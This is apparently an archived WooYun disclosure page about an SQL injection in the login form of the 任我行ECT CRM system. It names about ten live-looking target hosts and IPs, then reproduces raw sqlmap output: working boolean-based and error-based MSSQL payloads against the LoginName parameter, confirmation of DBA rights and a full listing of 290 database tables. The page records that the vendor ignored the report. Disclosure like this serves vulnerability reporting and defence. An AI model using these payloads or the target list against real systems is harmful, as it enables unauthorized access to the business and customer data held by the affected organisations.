乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-04-01: 细节已通知厂商并且等待厂商处理中 2015-04-06: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放 2015-05-31: 细节向核心白帽子及相关领域专家公开 2015-06-10: 细节向普通白帽子公开 2015-06-20: 细节向实习白帽子公开 2015-07-05: 细节向公众公开
rt
任我行ECT (企业“管人管事”执行管控工具)登录框存在post注入。。DBA权限。案例:
http://120.31.62.218/http://crm.netzone.com/http://121.9.201.153/http://221.10.14.66/zhang/http://61.184.240.105/crm/http://crm.ec3s.com/http://crm.kx8.cn/http://crm.techray.com.cn/http://tianzhengtaisheng.3322.org/crm/http://www.hanna.com.cn:956/
http://crm.netzone.com/VerifyUser.asp
sqlmap identified the following injection points with a total of 45 HTTP(s) requests:---Parameter: LoginName (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: LoginName=admin' AND 6853=6853 AND 'XQMw'='XQMw&Password=admin&Validatepwds=&LockNum=err&UserRank=0 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: LoginName=admin' AND 4996=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (4996=4996) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(122)+CHAR(106)+CHAR(113))) AND 'kmly'='kmly&Password=admin&Validatepwds=&LockNum=err&UserRank=0---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2008current database: 'grasp_crm'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: LoginName (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: LoginName=admin' AND 6853=6853 AND 'XQMw'='XQMw&Password=admin&Validatepwds=&LockNum=err&UserRank=0 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: LoginName=admin' AND 4996=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (4996=4996) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(122)+CHAR(106)+CHAR(113))) AND 'kmly'='kmly&Password=admin&Validatepwds=&LockNum=err&UserRank=0---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2008current user is DBA: Truesqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: LoginName (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: LoginName=admin' AND 6853=6853 AND 'XQMw'='XQMw&Password=admin&Validatepwds=&LockNum=err&UserRank=0 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: LoginName=admin' AND 4996=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (4996=4996) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(122)+CHAR(106)+CHAR(113))) AND 'kmly'='kmly&Password=admin&Validatepwds=&LockNum=err&UserRank=0---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2008Database: grasp_crm[290 tables]+------------------------------------+| CRM_Activity || CRM_ActivityClassification1 || CRM_ActivityClassification2 || CRM_ActivityClassification3 || CRM_ActivityCoEmployee || CRM_ActivityRecord || CRM_ActivityStyle || CRM_AllCanReport || CRM_AllCanReportIndex || CRM_AllCanReportUserList || CRM_BBS || CRM_BBSChannel || CRM_BBSVoteDetail || CRM_BbsColumn || CRM_BbsColumnStyle || CRM_BbsNotify || CRM_BbsRight || CRM_BbsRightTempletDetail || CRM_BbsSubscribe || CRM_BbsUserInfo || CRM_BbsVote || CRM_BusinessActivity || CRM_BusinessActivityStyle || CRM_ChatInfo || CRM_ChatOnlineUser || CRM_ChatRoomInfo || CRM_CoEmail || CRM_CoObject || CRM_CoObjectRelation || CRM_Commodity || CRM_CommodityClassification1 || CRM_CommodityClassification2 || CRM_CommodityClassification3 || CRM_CommodityGallery || CRM_CompanyContect || CRM_ConstDefineCusSetting || CRM_ContractClassfication1 || CRM_ContractClassfication2 || CRM_ContractCoEmployee || CRM_ContractManage || CRM_ContractRecord || CRM_CustomConfig || CRM_CustomConfigNew || CRM_CustomHtml || CRM_CustomImformation || CRM_CustomTable1 || CRM_CustomTable2 || CRM_CustomTable3 || CRM_CustomTableCoObject || CRM_DataRight || CRM_DataSyncMapInfo || CRM_DataSyncTaskDetail || CRM_DayMotto || CRM_Department || CRM_DeskTopRecord || CRM_DispatchTask || CRM_DispatchTaskMsg || CRM_DutyCoEmployee || CRM_DutyTable || CRM_Email || CRM_Employee || CRM_EmployeeIPConfig || CRM_EmployeeStyle || CRM_ExMailAddresslist || CRM_ExMailSetting || CRM_ExPanMailBox || CRM_Exam_feedbackshare || CRM_ExpanRight || CRM_ExpanTableForTree || CRM_Favorite || CRM_Fee || CRM_FeeClassification1 || CRM_FeeClassification2 || CRM_FeeCoEmployee || CRM_FeePlan || CRM_FeePlanItem || CRM_FeePostil || CRM_FeeStyle || CRM_Gallery || CRM_Help || CRM_HelpActivity || CRM_IPInfo || CRM_InterBatchAddDraft || CRM_Interunit || CRM_InterunitClassification1 || CRM_InterunitClassification2 || CRM_InterunitClassification3 || CRM_InterunitClassification4 || CRM_InterunitClassification5 || CRM_InterunitClassification6 || CRM_InterunitClassification7 || CRM_InterunitClassification8 || CRM_InterunitCoShareInfo || CRM_InterunitDraftDetial || CRM_InterunitGallery || CRM_InterunitMap || CRM_InterunitSaleTaskMoveLog || CRM_InterunitShareInfo || CRM_InterunitStyle || CRM_InterunitStyleRight || CRM_InterunitTel || CRM_InterunitTelLog || CRM_InterunitTemplet || CRM_KpiCoForm || CRM_KpiExtraScore || CRM_KpiMain || CRM_KpiScore || CRM_KpiTable || CRM_KpiTableCoExaminee || CRM_KpiTableCoScoreMan || CRM_KpiTableItem || CRM_KpiTemplete || CRM_KpiTempleteItem || CRM_Lable || CRM_Limit || CRM_LimitTemplet || CRM_LimitTempletNew || CRM_LinkMan || CRM_LinkManClassification1 || CRM_LinkManDepartment || CRM_LinkManWork || CRM_LoginUser || CRM_MeetingMessage || CRM_MeetingRec || CRM_Message || CRM_MessageNoRead || CRM_MessageUsedReceiver || CRM_MobileMsgRecord || CRM_MobileMsgTemp || CRM_ModifyInterUnit || CRM_MsgReceiverGroup || CRM_MyConcern || CRM_MyImportance || CRM_MyInstancy || CRM_MyPlan || CRM_MyPlanCoEmployee || CRM_MyPlanStyle || CRM_MySelectCreator || CRM_MyTask || CRM_MyTaskCoEmployee || CRM_MyTaskColKpiDate || CRM_MyTaskModifyRecord || CRM_MyTaskPostil || CRM_MyTaskResualt || CRM_MyTaskStyle || CRM_MyTaskSummary || CRM_MyTaskSummaryPostil || CRM_MyTaskView || CRM_NewCoMessage || CRM_Notepaper || CRM_ObjectLable || CRM_OnlineUser || CRM_OrderForm || CRM_OrderFormCoEmployee || CRM_PPControl || CRM_PopuMsgCenter_Help || CRM_PopuMsgCenter_News || CRM_PopuMsgCenter_Schedule || CRM_PreGetEmail || CRM_PreSendCoMail || CRM_ProPriceCoEmployee || CRM_Project || CRM_ProjectClassification1 || CRM_ProjectClassification2 || CRM_ProjectClassification3 || CRM_ProvidePrice || CRM_ProvidePriceClassfication || CRM_QuickGetNoReadMessage || CRM_ReportAuditCoEmployee || CRM_RightFunName || CRM_RoutineWork || CRM_RoutineWorkDetail || CRM_RoutineWorkPerson || CRM_SMSSigName || CRM_SMSmsgGroup || CRM_SaleTaskRecord || CRM_SalesAssistor || CRM_SalesCoCommodity || CRM_SalesRegister || CRM_SalesRegisterRecord || CRM_SalesStatus || CRM_SalesTarget || CRM_SalesTask || CRM_SalesTaskClassification1 || CRM_SalesTaskCommerce || CRM_SalesTaskComplete || CRM_SalesTaskDemand || CRM_SalesTaskDetail || CRM_SalesTaskGeneral || CRM_SalesTaskPostile || CRM_SalesTaskQuote || CRM_SalesTaskStyle || CRM_Schedule || CRM_ScheduleCoEmployee || CRM_ScheduleCoFee || CRM_SchedulePostil || CRM_ScheduleType || CRM_SerialNumber || CRM_Service || CRM_ServiceAssistor || CRM_ServiceClassification1 || CRM_ServiceClassification2 || CRM_ServiceClassification3 || CRM_ServiceKnowledge || CRM_ServiceKnowledgeStyle || CRM_ServiceManage || CRM_ServiceManageClassification1 || CRM_ServiceManageStyle || CRM_ServiceNotice || CRM_ServiceNoticeClassification1 || CRM_ServiceNoticeClassification2 || CRM_ServiceNoticeCopyMan || CRM_ServiceNoticeType || CRM_ServicePostile || CRM_ServiceProcess || CRM_ServiceProcessClassification1 || CRM_ServiceReply || CRM_SolarData || CRM_SolarMonthData || CRM_SummaryForDayTask || CRM_SummaryPostil || CRM_SystemParameter || CRM_TaskCheckViewDetial || CRM_Tellist || CRM_Template || CRM_UploadFile || CRM_UserConfig || CRM_UserLimitTempletMap || CRM_UserLoginInfo || Exam_ExamCoExamer || Exam_ExamCoTemp || Exam_ExamerAnalysis || Exam_Fillblank_Key || Exam_HXYConfig || Exam_HXY_CaseAndConsultationReport || Exam_HXY_Interunit1 || Exam_HXY_Interunit2 || Exam_HXY_Iter_Consu || Exam_HXY_Recommendedtraining || Exam_InviteRelations || Exam_List || Exam_LoginUser || Exam_MainType || Exam_QuestionScore || Exam_SubjectItem || Exam_SubjectStore || Exam_Templet || Exam_TempletCoResult || Exam_TempletCoResult_Array || Exam_TempletCoResult_Fields || Exam_TempletCoResult_ShowResults || Exam_Templet_BigItem || Exam_Templet_SmallItem || WF_Copyer || WF_Examiner || WF_Instance || WF_Instance_StepInfo || WF_Instance_StepInfoHis || WF_Instance_Steps || WF_Instance_StepsHis || WF_Main || WF_MainType || WF_NewFields || WF_NodeFlow || WF_NodeFlow_Condition || WF_Nodes || WF_UserList || WF_Writor || dtproperties || vInterunitKeySearch || vwCRM_Activity || vwCRM_BillProductDetail || vwCRM_Interunit || vwCRM_InterunitAllCoObject || vwCRM_InterunitForAll || vwCRM_InterunitForLinkman || vwCRM_InterunitForTelCall || vwCRM_LinkmanDetail || vwCRM_SaleTask || vwCRM_SaleTaskDetail || vwCRM_SaleTaskDetail2 || vwCRM_Schedule || vwCRM_TeamSummary || vwCRM_VirtualProfitSalesRegister || vwCRM_VirtualProfitSalesTask || vwCRM_WFList || vwCRM_interunitForReport || vw_LinkmanDefault || vw_UserDep || vw_UserInterunitStyle |+------------------------------------+
过滤
危害等级:无影响厂商忽略
忽略时间:2015-07-05 10:59
漏洞Rank:4 (WooYun评价)
暂无